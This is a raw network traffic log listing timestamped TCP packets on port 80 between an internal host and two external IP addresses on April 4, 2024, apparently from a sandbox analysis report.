Apr 4, 2024 17:49:06.482753992 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.482786894 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.482789040 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.482816935 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.482822895 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.482863903 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.482897997 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.482906103 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.482918978 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.482928991 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.482950926 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.482966900 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.483009100 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.483043909 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.483063936 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.483077049 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.483108997 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.483112097 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.483124971 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.483136892 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.483145952 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.483156919 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.483174086 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.483202934 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.483215094 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.483263016 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.483279943 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.483299017 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.483318090 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.483326912 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.483331919 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.483341932 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.483383894 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.483403921 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.483431101 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.483443975 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.483449936 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.483458042 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.483460903 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.483494043 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.497910976 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.598412991 CEST	80	49734	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:06.598490953 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:06.605631113 CEST	49734	80	192.168.2.10	189.195.132.134
Apr 4, 2024 17:49:06.625247955 CEST	80	49732	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:06.702721119 CEST	80	49733	189.195.132.134	192.168.2.10
Apr 4, 2024 17:49:06.829399109 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.829431057 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.829449892 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.829468012 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.829487085 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.829492092 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.829518080 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.829529047 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.829534054 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.829556942 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.829560995 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.829567909 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.829577923 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.829598904 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.829627037 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.829648972 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.829664946 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.829705954 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.829869032 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.829885960 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.829926014 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.829946995 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.829963923 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.829993010 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.830024958 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.830034971 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.830069065 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.830091953 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.830116034 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.830118895 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.830132961 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.830152035 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.830169916 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.830173016 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.830212116 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.830576897 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.830620050 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.830636024 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.830653906 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.830656052 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.830674887 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.830698967 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.830713034 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.830732107 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.830749989 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.830769062 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.830792904 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.830809116 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.830840111 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.830854893 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.830873013 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.830876112 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.830909967 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.830918074 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.830929995 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.830969095 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.830992937 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.831017971 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.831037045 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.831056118 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.831056118 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.831074953 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.831089973 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.831104040 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.831120968 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.831140041 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.831163883 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.831193924 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.831197977 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.831211090 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.831228971 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.831248045 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.831285000 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.831301928 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.831320047 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.831326962 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.831365108 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.831382036 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.831399918 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.831403017 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.831450939 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.831456900 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.831473112 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.831496000 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.831515074 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.831516981 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.831533909 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.831536055 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.831556082 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.831573963 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.831614971 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.831634998 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.831653118 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.831674099 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.831696033 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.831737995 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.831754923 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.831773043 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.831792116 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.831804037 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.831809998 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.831829071 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.831840992 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.831854105 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.831864119 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.831873894 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.831887960 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.831907988 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.831916094 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.831927061 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.831964016 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.831968069 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.832000017 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.832020044 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.832040071 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.832056999 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.832063913 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.832093000 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.832109928 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.832149982 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.832156897 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.832191944 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.832196951 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.832247019 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.832262993 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.832277060 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.832284927 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.832297087 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.832324028 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.832334995 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.832375050 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.832387924 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.832405090 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.832483053 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.832493067 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.832500935 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.832509995 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.832524061 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.832542896 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.832549095 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.832561016 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.832581997 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.832595110 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.832600117 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.832619905 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.832633018 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.832652092 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.832705021 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.832724094 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.832726002 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.832746029 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.832746983 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.832766056 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.832772017 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.832786083 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.832822084 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.832838058 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.832858086 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.832875967 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.832901001 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.832910061 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.832930088 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.832963943 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.832998991 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.833034992 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.833039999 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.833076954 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.833082914 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.833101034 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.833136082 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.833143950 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.833156109 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.833189964 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.833209038 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.833225012 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.833225012 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.833265066 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.833273888 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.833292961 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.833317041 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.833323956 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.833333015 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.833367109 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.833384991 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.833404064 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.833424091 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.833441973 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.833448887 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.833461046 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.833478928 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.833525896 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.833543062 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.833561897 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.833580017 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.833583117 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.833600044 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.833612919 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.833619118 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.833636999 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.833650112 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.833657026 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.833678961 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.833713055 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.833729982 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.833769083 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.833803892 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.833818913 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.833853006 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.833869934 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.833887100 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.833904028 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.833921909 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.833924055 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.833937883 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.833961010 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.833996058 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.833997965 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.834014893 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.834033966 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.834074020 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.834089041 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.834105015 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.834106922 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.834122896 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.834131956 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.834141970 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.834162951 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.834178925 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.834214926 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.834213972 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.834233999 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.834274054 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.834290028 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.834305048 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.834346056 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.834357977 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.834373951 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.834392071 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.834414005 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.834434032 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.834450006 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.834469080 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.834471941 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.834490061 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.834507942 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.834527016 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.834547043 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.834549904 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.834564924 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.834604025 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.834620953 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.834681034 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.834696054 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.834717035 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.834733963 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.834749937 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.834769011 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.834786892 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.834789991 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.834805965 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.834813118 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.834834099 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.834851980 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.834852934 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.834875107 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.834913015 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.834944010 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.834959984 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.834978104 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.835000038 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.835015059 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.835017920 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.835031986 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.835051060 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.835068941 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.835072041 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.835108042 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.835110903 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.835141897 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.835160017 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.835177898 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.835177898 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.835218906 CEST	49730	80	192.168.2.10	103.23.232.80
Apr 4, 2024 17:49:06.835252047 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.835267067 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.835285902 CEST	80	49730	103.23.232.80	192.168.2.10
Apr 4, 2024 17:49:06.835303068 CEST	80	49730	103.23.232.80	192.168.2.10
